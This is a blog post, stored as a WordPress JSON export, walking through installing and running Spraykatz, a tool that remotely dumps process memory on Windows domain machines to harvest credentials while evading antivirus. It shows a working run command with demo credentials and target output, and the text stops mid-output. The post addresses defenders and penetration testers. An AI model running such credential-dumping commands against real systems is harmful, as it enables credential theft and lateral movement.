{"id":2322,"date":"2020-03-28T19:29:17","date_gmt":"2020-03-28T17:29:17","guid":{"rendered":"https:\/\/www.identitycosmos.com\/?p=2322"},"modified":"2020-03-28T19:29:17","modified_gmt":"2020-03-28T17:29:17","slug":"spraykatz-a-fantastic-tool-for-blueteam-or-redteam-who-want-to-evaluate-lateral-movement-or-privilege-escalation-weakness-on-active-directory-environments","status":"publish","type":"post","link":"https:\/\/identitycosmos.com\/index.php\/2020\/03\/28\/spraykatz-a-fantastic-tool-for-blueteam-or-redteam-who-want-to-evaluate-lateral-movement-or-privilege-escalation-weakness-on-active-directory-environments\/","title":{"rendered":"Spraykatz : a fantastic tool for Blueteam or Redteam who want to evaluate lateral movement or privilege escalation weakness on Active Directory environments"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf1.png\" alt=\"\"><\/p>\n<h1>Introduction to Spraykatz<\/h1>\n<p>As you may know, password hash dump is a very useful method to perform lateral movement or privilege escalation on a network. 
If you are using Active Directory, this method is used by a lot of modern malware, which includes code pieces from well-known security tools such as Mimikatz.<\/p>\n<p>In this article, we will explore Spraykatz (v0.9.6), a magnificent tool written by @lydericlefebvre which can help in different situations:<\/p>\n<ul>\n<li>BlueTeam: you want to evaluate how exposed you are to password hash dumping, and detect whether malware or attackers can use this method to find traces of privileged accounts on your workstations<\/li>\n<li>RedTeam: you want to explore the workstations and find a privileged account to use during your escalation<\/li>\n<li>Security Officer, CISO: you want to demonstrate to your internal people how malware can use password hashes, in order to educate them about security issues<\/li>\n<\/ul>\n<p>Spraykatz is a tool able to <strong>retrieve credentials<\/strong> on <a href=\"https:\/\/www.kitploit.com\/search\/label\/Windows\" target=\"_blank\" title=\"Windows\" rel=\"noopener noreferrer\">Windows<\/a> machines and large <a href=\"https:\/\/www.kitploit.com\/search\/label\/Active%20Directory\" target=\"_blank\" title=\"Active Directory\" rel=\"noopener noreferrer\">Active Directory<\/a> environments. 
It simply tries to <strong>procdump<\/strong> machines and <strong>parse dumps remotely<\/strong> in order to <strong>avoid detection<\/strong> by <a href=\"https:\/\/www.kitploit.com\/search\/label\/Antivirus\" target=\"_blank\" title=\"antivirus\" rel=\"noopener noreferrer\">antivirus<\/a> software as much as possible.<\/p>\n<p>Spraykatz uses slightly modified parts of the following projects:<\/p>\n<ul>\n<li>Mimikatz<\/li>\n<li>Impacket<\/li>\n<li>Pypykatz<\/li>\n<li>Pywerview<\/li>\n<li>Sysinternals<\/li>\n<li>hackndo<\/li>\n<\/ul>\n<h1>How to install Spraykatz<\/h1>\n<p>For this article I was using a Kali distro, but you can use Ubuntu as well (I tested it on both distros and it worked like a charm).<\/p>\n<p>Let&#8217;s be root:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>sudo su<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Update the package index so that the following installs use current package information:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# apt update<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading package lists&#8230; Done<br 
\/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building dependency tree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading state information&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>All packages are up to date.<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Ok, here I already have everything updated on my Kali system.<\/p>\n<p>If you don&#8217;t already have the latest versions of python, git and nmap, install or update them:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:\/tmp\/mimipenguin-master# apt install -y python3.6 python3-pip git nmap<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading package lists&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building dependency tree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading state information&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-cups&#8217; for regex &#8216;python3.6&#8217;<br 
\/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-cairo&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-2to3&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-urwid&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-smbc&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;libpython3.6-stdlib&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-crypto&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-cairo&#8217; instead of &#8216;python3.6-cairo&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-crypto&#8217; instead of &#8216;python3.6-crypto&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-cups&#8217; instead of &#8216;python3.6-cups&#8217;<br 
\/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-smbc&#8217; instead of &#8216;python3.6-smbc&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-urwid&#8217; instead of &#8216;python3.6-urwid&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>git is already the newest version (1:2.20.1-2).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>git set to manually installed.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>nmap is already the newest version (7.70+dfsg1-6kali1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>nmap set to manually installed.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-cairo is already the newest version (1.16.2-1+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-crypto is already the newest version (2.6.1-9+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-cups is already the newest version (1.9.73-2+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-pip is already the newest version (18.1-5).<br \/>\n<\/strong><\/span><\/p>\n<p><span 
style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-smbc is already the newest version (1.0.15.6-1+b2).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-urwid is already the newest version (2.0.1-2+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Ok, here I already have everything updated on my Kali system.<\/p>\n<p>Now, our system is ready to install Spraykatz from Github:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# git clone &#8211;recurse-submodules https:\/\/github.com\/aas-n\/spraykatz.git<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Cloning into &#8216;spraykatz&#8217;&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Enumerating objects: 29, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Counting objects: 100% (29\/29), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: 
Compressing objects: 100% (27\/27), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Total 383 (delta 8), reused 5 (delta 1), pack-reused 354<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Receiving objects: 100% (383\/383), 21.51 MiB | 761.00 KiB\/s, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Resolving deltas: 100% (207\/207), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Submodule &#8216;submodules\/impacket&#8217; (https:\/\/github.com\/SecureAuthCorp\/impacket.git) registered for path &#8216;submodules\/impacket&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Cloning into &#8216;\/root\/spraykatz\/submodules\/impacket&#8217;&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Enumerating objects: 17060, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Total 17060 (delta 0), reused 0 (delta 0), pack-reused 17060<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Receiving objects: 100% (17060\/17060), 5.64 MiB | 824.00 KiB\/s, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Resolving deltas: 100% (13026\/13026), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white\"><span 
style=\"font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Submodule path &#8216;submodules\/impacket&#8217;: checked out &#8216;d6b5bd4e2f3fe3e9fa252dcd2a1dd76faa0c5395&#8217;<\/strong><\/span><br \/>\n<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Now Spraykatz is cloned on your system.<\/p>\n<p>Go to the Spraykatz folder:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# cd spraykatz<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>And use pip to install packages from the index (requirements.txt):<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~\/spraykatz# pip3 install -r requirements.txt<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyCryptodomex in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 1)) (3.6.1)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyasn1 in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 2)) 
(0.4.2)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyOpenSSL in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 3)) (19.0.0)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting pypykatz&gt;=0.3.0 (from -r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/68\/4a\/2436e462a7c9ad3df263f5b14998b664bdc62f2d4352af142b5defafeada\/pypykatz-0.3.2-py3-none-any.whl (271kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 276kB 749kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: lxml in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 5)) (4.3.2)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting minidump&gt;=0.0.11 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/6b\/4e\/ae61bddb6d5ada7ee0e718d08b697a58aba66bdd1428b83e06c5ba914579\/minidump-0.0.11-py3-none-any.whl (62kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; 
font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 71kB 1.3MB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting minikerberos&gt;=0.0.11 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/ae\/87\/0063d15dcb43a7a0746f57c69dfc1ee86b0608728d40d3791f06fa8b046a\/minikerberos-0.0.11-py3-none-any.whl (96kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 102kB 402kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting msldap&gt;=0.1.1 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/9d\/5b\/a8d65a7a8aa047f0312b0cda890ab06a64c5d3f364374c1603af2acebb95\/msldap-0.2.5-py3-none-any.whl (40kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% 
|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 40kB 1.1MB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting aiowinreg&gt;=0.0.1 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/59\/25\/31cd1c57c8322e1e88d246d923bb00a88e326722c238b3a466d411d73fd4\/aiowinreg-0.0.2-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting winsspi&gt;=0.0.3 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/65\/fe\/5aa78fe5983f9203cca9453c771711cfe6eafc91870cab7294f201d5d0a8\/winsspi-0.0.3-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: asn1crypto in \/usr\/lib\/python3\/dist-packages (from minikerberos&gt;=0.0.11-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4)) (0.24.0)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting asciitree (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading 
https:\/\/files.pythonhosted.org\/packages\/2d\/6a\/885bc91484e1aa8f618f6f0228d76d0e67000b0fdd6090673b777e311913\/asciitree-0.3.3.tar.gz<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting socks5line&gt;=0.0.3 (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/2f\/51\/9b64da14e5bddb19abd8fd9a0d7c9b564b0e860ae5c52f8090af6dbfa02a\/socks5line-0.0.3-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting aiocmd (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/a7\/d7\/1237391649ab4d86a6d5520361727e938b4ec47df834e688189dd83642bf\/aiocmd-0.1.2-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: ldap3&lt;2.5.2 in \/usr\/lib\/python3\/dist-packages (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4)) (2.5.1)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting prompt-toolkit&gt;=2.0.9 (from aiocmd-&gt;msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading 
https:\/\/files.pythonhosted.org\/packages\/7f\/1f\/e145dd467dc9b0e6f1e64232c03119498dfec497e383f1e8be9f83eaa97e\/prompt_toolkit-3.0.2-py3-none-any.whl (344kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 348kB 711kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting wcwidth (from prompt-toolkit&gt;=2.0.9-&gt;aiocmd-&gt;msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/7e\/9f\/526a6947247599b084ee5232e4f9190a38f398d7300d866af3ab571a5bfe\/wcwidth-0.1.7-py2.py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building wheels for collected packages: asciitree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Running setup.py bdist_wheel for asciitree &#8230; done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Stored in directory: \/root\/.cache\/pip\/wheels\/1d\/d9\/58\/9808b306744df0208fccc640d3d9952a5bc7468502d42897d5<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Successfully built asciitree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; 
<strong>Installing collected packages">
font-size:14pt; background-color:#080329\"><strong>Installing collected packages: minidump, minikerberos, asciitree, socks5line, wcwidth, prompt-toolkit, aiocmd, msldap, aiowinreg, winsspi, pypykatz<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Successfully installed aiocmd-0.1.2 aiowinreg-0.0.2 asciitree-0.3.3 minidump-0.0.11 minikerberos-0.0.11 msldap-0.2.5 prompt-toolkit-3.0.2 pypykatz-0.3.2 socks5line-0.0.3 wcwidth-0.1.7 winsspi-0.0.3<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Now Spraykatz is fully installed!<\/p>\n<h1>How to use Spraykatz<\/h1>\n<p>Spraykatz is very simple to use. To use it, you will need to determine:<\/p>\n<ul>\n<li>Which account to use to perform the exploration \u2013 here you need a privileged account (i.e. local Admin privilege) on the target system. You may have discovered this type of account through different methods, or, even worse, the company may be providing regular user accounts which are local Admin on the workstation.<\/li>\n<li>Which machine or machine range you want to target.<\/li>\n<\/ul>\n<p>In this article&#8217;s example, we will use the following settings:<\/p>\n<ul>\n<li>Active Directory domain: win2019.priv<\/li>\n<li>Account which has local Admin privilege on the target computer: dark<\/li>\n<li>Account password: demo_spraykatz<\/li>\n<li>Target computer: 10.0.0.201<\/li>\n<\/ul>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~\/spraykatz# .\/spraykatz.py -u dark@win2019.priv -p demo_spraykatz -t 10.0.0.201<br 
\/>\n<\/strong><\/span><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf2.png\" alt=\"\"><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong><br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#] Hey, did you read the code?<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Listing targetable machines into networks provided. Can take a while&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Checking local admin access on targets&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[~]   10.0.0.201 is <span style=\"color:#00b050\">pwnable<span style=\"color:white\">!<br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Exec procdump on targets. Be patients&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[~]   ProcDumping <span style=\"color:#00b050\">10.0.0.201<span style=\"color:white\">. 
